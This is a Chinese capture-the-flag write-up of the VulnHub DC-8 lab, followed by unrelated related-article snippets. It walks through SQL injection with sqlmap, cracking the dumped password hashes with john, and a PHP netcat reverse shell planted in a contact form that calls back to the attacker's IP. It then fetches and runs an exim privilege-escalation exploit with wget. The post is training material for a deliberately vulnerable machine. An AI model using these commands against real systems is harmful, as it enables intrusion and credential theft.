靶场练习第十六天~vulnhub靶场之dc-8

一、准备工作

kali和靶机都选择NAT模式(kali与靶机同网段)

1.靶场环境

下载链接:https://download.vulnhub.com/dc/DC-8.zip

2.kali的ip

命令:ifconfig

3.靶机的ip

扫描靶机ip

sudo arp-scan -l

二、信息收集

1.nmap的信息收集

(1)扫描靶机开放的端口及其服务

nmap -A -p- 192.168.101.121

2.网站的信息收集

(1)靶机开放了80端口,先访问靶机网站看看有什么有用的信息

 

三、漏洞发现及其利用

(1)sql注入

1.使用sqlmap

sqlmap -u http://192.168.101.121?nid=1 -current-db -batch #获取当前数据库

sqlmap -u http://192.168.101.121/?nid=1 -D d7db -tables -batch # 获取表名

sqlmap -u http://192.168.101.121/?nid=1 -D d7db -T users -columns -batch #获取字段名

sqlmap -u http://192.168.101.121/?nid=1 -D d7db -T users -C name,pass -dump #获取账号密码

获取当前数据库

获取表名user

获取字段名name、pass

获取账号密码

2.john解码

创建一个文本将刚才获取到的密码放到里面,通过john解码

vi pass

$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z

$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF

:wq

cat pass

john pass

只得出一个turtle密码,不知道是admin还是john,都试一下

最后只能是john

登录成功

(2)反弹getshell

1.添加getshell

发现观察页面,发现Concat Us可以修改内容,到web写一个php反弹shell

点击form settins进行编写getshell的语句

dsasffafgssgss

<?php

system('nc -e /bin/bash 192.168.101.10 1234');

?>

页面最后面有一个save configuration,点击它保存


2.反弹shell

(1)在kali这边开启监听

nc -lvvp 1234

(2)回到刚才登录到页面,随便提交点东西

(3)回到kali,发现已经监听成功

(4)优化命令执行终端,执行下面命令进入python交互式(注意要下载python环境才能运行)

python -c 'import pty;pty.spawn("/bin/bash")'

(3)提权

1.查找具有suid权限的命令,发现可疑命令exim4,百度一下,exim是一款在Unix系统上使用的邮件服务,exim4在使用时具有root权限

find / -user root -perm -4000 -print 2>/dev/null

2.查看exim版本

/usr/sbin/exim4 --version

3.使用searchsploit工具查找exim版本脚本信息

searchsploit exim

4.将攻击代码下载到当前目录并使用dos2unix修改格式为unix,避免后面需要在脚本中再操作,或者在靶机上修改脚本内容(在文件内容终端输入:set ff=unix,使windows代码能在Unix上执行)

apt install dos2unix

cd /home

cp /usr/share/exploitdb/exploits/linux/local/46996.sh /home

dos2unix 46996.sh

5.在kali开启一个Http服务

python -m SimpleHTTPServer

6.在靶机上将46996.sh脚本文件下载在靶机本地并提升权限

cd /tmp

wget http://192.168.101.10:8000/46996.sh

chmod 777 46996.sh

7.启动脚本进行提权

./46996.sh -m netcat

8.找到flag

cat /root/flag.txt

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/375036.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

【SpringMVC】SpringMVC系列4之@RequestParam 映射请求参数值

4、RequestParam 映射请求参数值 4.1、概述 Spring MVC 通过分析处理方法的签名&#xff0c;将 HTTP 请求信息绑定到处理方法的相应人参中。Spring MVC 对控制器处理方法签名的限制是很宽松的&#xff0c;几乎可以按喜欢的任何方式对方法进行签名。必要时可以对方法及方法入…

Sprint3

进展&#xff1a;今天主要是各自熟悉安卓应用开发平台&#xff0c;设计了图标&#xff0c;没什么实际上的进展。 燃尽图&#xff1a; 团队工作照&#xff1a; 转载于:https://www.cnblogs.com/XJXYJ/p/4495810.html

靶场练习第十七天~vulnhub靶场之dc-9

一、准备工作 kali和靶机都选择NAT模式&#xff08;kali与靶机同网段&#xff09; 1.靶场环境 下载链接:https://download.vulnhub.com/dc/DC-9.zip 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 &#xff08;1&am…

Linux内核分析 02

二&#xff0c;操作系统是如何工作的 1、函数调用堆栈 三大法宝&#xff1a;存储程序计算机 函数调用堆栈 中断机制 堆栈&#xff1a;是C语言程序运行时必须的一个记录调用路径和参数的空间。是计算机内部现成的东西&#xff0c;我们直接使用。 包括函数调用框架、传递参数、保…

靶场练习第十八天~vulnhub靶场之hackableII

一、准备工作 kali和靶机都选择NAT模式&#xff08;kali与靶机同网段&#xff09; 1.靶场环境 下载链接:Hackable: II ~ VulnHub 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 &#xff08;1&#xff09;扫描靶机开…

靶场练习第二十天~vulnhub靶场之Funbox: Scriptkiddie

一、环境搭建 靶官网机下载地址&#xff1a;Funbox: Scriptkiddie ~ VulnHub 百度云盘下载链接: 百度网盘 请输入提取码 提取码: i4a9 二、信息收集 1.nmap命令扫描靶机 先用ifconfig查看kali的IP&#xff0c;因为kali和靶机都是NAT模式下&#xff0c;所以用 nmap 192.168…

spring mvc 多线程并发

ThreadLocal为解决多线程程序的并发问题提供了一种新的思路。使用这个工具类可以很简洁地编写出优美的多线程程序。 http://www.xuebuyuan.com/1628190.html 我们知道Spring通过各种DAO模板类降低了开发者使用各种数据持久技术的难度。这些模板类都是线程安全的&#xff0c;也就…

靶场练习第十九天~vulnhub靶场之GreenOptic: 1

一、准备工作 kali和靶机都选择NAT模式&#xff08;kali与靶机同网段&#xff09; 1.靶场环境 下载链接:GreenOptic: 1 ~ VulnHub 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 &#xff08;1&#xff09;扫描靶机开…

靶场练习第二十五天~vulnhub靶场之Raven-2

一、准备工作 kali和靶机都选择NAT模式&#xff08;kali与靶机同网段&#xff09; 1.靶场环境 下载链接:Raven: 2 ~ VulnHub 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 &#xff08;1&#xff09;扫描靶机开放的…

每天一个linux命令(46):vmstat命令

vmstat是Virtual Meomory Statistics&#xff08;虚拟内存统计&#xff09;的缩写&#xff0c;可对操作系统的虚拟内存、进程、CPU活动进行监控。他是对系统的整体情况进行统计&#xff0c;不足之处是无法对某个进程进行深入分析。vmstat 工具提供了一种低开销的系统性能观察方…

用TypeScript开发了一个网页游戏引擎,开放源代码

最开始学习电脑编程的原动力之一就是想自己编写游戏&#xff0c;一方面很好奇这些游戏是怎么做出来的&#xff0c;另一方面觉得有些地方设计的不合理&#xff0c;希望电脑游戏既能让人玩的有趣&#xff0c;又不浪费时间。 学校五年&#xff0c;毕业十年&#xff0c;学用了十多种…

靶场练习第二十一天~vulnhub靶场之Momentum-1

一、环境搭建 1.ifconfig查看kali的ip 2.创建靶机 靶机下载地址&#xff1a;Momentum: 1 ~ VulnHub 二、信息收集 1.nmap命令 寻找靶机ip&#xff1a;nmap 192.168.101.0/24 2.端口扫描 使用命令&#xff1a;nmap -A -T4 -p 1-65535 192.168.101.113&#xff0c;发现开放2…

靶场练习第二十二天~vulnhub靶场之Momentum-2

一、准备工作 靶机下载地址&#xff1a;Momentum: 2 ~ VulnHub 1.查看kali的ip 使用命令ifconfig 2.使用nmap命令 nmap 192.168.101.0/24 查看开放的端口和协议&#xff1a;nmap -sV 192.168.101.114 二、信息收集 1.使用gobuster&#xff0c;寻找隐藏的网站 gobuster di…

索引深入浅出(8/10):覆盖索引或列包含

在索引深入浅出&#xff1a;非聚集索引的B树结构在聚集表里&#xff0c;在聚集表里&#xff0c;我们看到非聚集索引的叶子层只包含非聚集索引键和聚集索引键。从聚集表结构或堆表结构里拿到剩下列&#xff0c;SQL Server需要进行书签/键查找操作。很多情况下书签或键查找非常消…

靶场练习第二十三天~vulnhub靶场之GOATSELINUX: 1

一、准备工作 kali和靶机都选择NAT模式&#xff08;kali与靶机同网段&#xff09; 1.靶场环境 下载链接:GoatseLinux: 1 ~ VulnHub 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 &#xff08;1&#xff09;扫描靶机…

靶场练习第二十四天~vulnhub靶场之Raven-1

一、准备工作 kali和靶机都选择NAT模式&#xff08;kali与靶机同网段&#xff09; 1.靶场环境 下载链接:Raven: 1 ~ VulnHub 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 &#xff08;1&#xff09;扫描靶机开放的…

【知识积累】DES算法之C#加密Java解密

一、前言 在项目需要添加安全模块&#xff0c;客户端调用服务端发布的service必须要经过验证&#xff0c;加密算法采用DES&#xff0c;客户端采用C#进行加密&#xff0c;服务端使用Java进行解密。废话不多说&#xff0c;直接上代码。 二、客户端 客户端采用C#进行开发&#xff…

Space.js – HTML 驱动的页面 3D 滚动效果

为了让我们的信息能够有效地沟通&#xff0c;我们需要创建用户和我们的媒体之间的强有力的联系。今天我们就来探讨在网络上呈现故事的新方法&#xff0c;并为此创造了一个开源和免费使用的 JavaScript 库称为 space.js。该库是 HTML 驱动的&#xff0c;这意味着你不需要在网站上…

离职感言-Symbio的5年工作回顾和总结(转载)

离职感言-Symbio的5年工作回顾和总结 (2011-06-02 21:06:30) 转载▼2005年底&#xff0c;当时我在西安过的还不错&#xff0c;结了婚&#xff0c;买了房&#xff0c;在公司也受老板器重&#xff0c;但是初为人父&#xff0c;孩子带给我的那种人生紧迫感&#xff1a;“再不趁还…

读Pyqt4教程,带你入门Pyqt4 _005

对话框窗体或对话框是现代GUI应用不可或缺的一部分。dialog定义为两个或多个人之间的交谈。在计算机程序中dialog是一个窗体&#xff0c;用来和程序“交谈”。对话框用来输入数据、修改数据、改变程序设置等等。对话框是用户和计算机程序沟通的重要手段。 QColorDialog 颜色对话…